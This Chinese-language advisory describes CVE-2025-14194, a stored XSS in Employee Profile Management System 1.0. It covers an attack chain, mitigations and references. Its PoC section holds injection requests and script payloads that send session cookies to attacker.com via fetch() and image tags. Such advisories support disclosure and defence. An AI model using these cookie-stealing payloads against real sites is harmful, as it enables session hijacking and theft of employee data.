CVE-2025-14194 Employee Profile Management System XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14194

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

code-projects Employee Profile Management System 1.0

漏洞概述

CVE-2025-14194是code-projects Employee Profile Management System 1.0版本中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于/view_personnel.php文件中的员工信息查看功能模块。攻击者可以通过在员工档案的地址字段（per_address）、学校字段（dr_school）或其他学校字段（other_school）中注入恶意JavaScript代码。当其他用户访问该页面查看员工信息时，恶意脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取或进一步的社会工程攻击。由于该漏洞需要低权限用户进行操作，且需要用户交互触发，因此CVSS评分仅为3.5，属于低危漏洞。

技术细节

该漏洞为存储型XSS（Stored XSS），攻击者将恶意脚本通过员工信息编辑功能写入数据库。由于系统未对用户输入进行充分的输入验证和输出编码，恶意脚本被永久存储在数据库中。当管理员或其他用户通过/view_personnel.php页面查看员工信息时，带有恶意载荷的数据从数据库取出并直接嵌入到HTML响应中，导致恶意脚本在用户浏览器中执行。攻击向量为网络形式，攻击者需要拥有低权限账户（PR:L）并诱导具有更高权限的用户访问恶意页面（UI:R）。受影响参数包括per_address、dr_school和other_school。攻击者可利用此漏洞窃取用户会话Cookie、进行键盘记录或重定向用户到恶意网站。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标系统为Employee Profile Management System 1.0，确认/view_personnel.php页面存在且处理用户输入

STEP 2

Initial Access

攻击者获取系统低权限账户（如普通员工账号），拥有编辑个人信息的权限

STEP 3

Payload Injection

通过员工信息编辑功能，在per_address/dr_school/other_school等字段中注入恶意JavaScript代码，代码被存储到数据库

STEP 4

Social Engineering

攻击者诱导具有管理权限的用户（如HR管理员）访问/view_personnel.php页面查看被植入恶意代码的员工档案

STEP 5

Execution

当受害者访问该页面时，恶意脚本在浏览器中执行，可窃取Cookie、会话令牌或进行其他恶意操作

STEP 6

Impact

攻击者可能劫持管理员会话，获取系统更高权限，窃取敏感员工数据或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14194 PoC - Stored XSS in Employee Profile Management System -->
<!-- Attack Vector: POST request to inject XSS payload -->

<!-- Step 1: Inject malicious script via personnel update -->
POST /employee_profile/ HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

per_address=<script>alert(document.cookie)</script>&dr_school=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>&other_school=<svg/onload=fetch('//attacker.com/log?d='+document.domain)>

<!-- Step 2: Trigger XSS when victim views personnel page -->
GET /view_personnel.php?id=[personnel_id] HTTP/1.1
Host: target.com
Cookie: [victim_session]

<!-- Example XSS payload for session hijacking -->
<script>
document.write('<img src="https://attacker.com/cookie?c='+document.cookie+'">');
</script>

影响范围

code-projects Employee Profile Management System 1.0

防御指南

临时缓解措施

临时缓解措施包括：1) 禁用/view_personnel.php页面的脚本执行或对该页面实施严格的输入验证；2) 对所有用户输入实施HTML实体编码，使用htmlspecialchars()或类似函数对<、>、'、"等字符进行转义；3) 部署WAF（Web应用防火墙）规则过滤XSS特征载荷；4) 监控日志中的可疑XSS攻击特征；5) 限制低权限用户编辑敏感字段的权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14194
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14194
3 Details https://www.cvedetails.com/cve/CVE-2025-14194/
4 VulDB https://vuldb.com/cve/CVE-2025-14194
5 Link https://code-projects.org/
6 Link https://github.com/shenxianyuguitian/employee-management-XSS
7 Link https://vuldb.com/?ctiid.334614
8 Link https://vuldb.com/?id.334614
9 Link https://vuldb.com/?submit.699246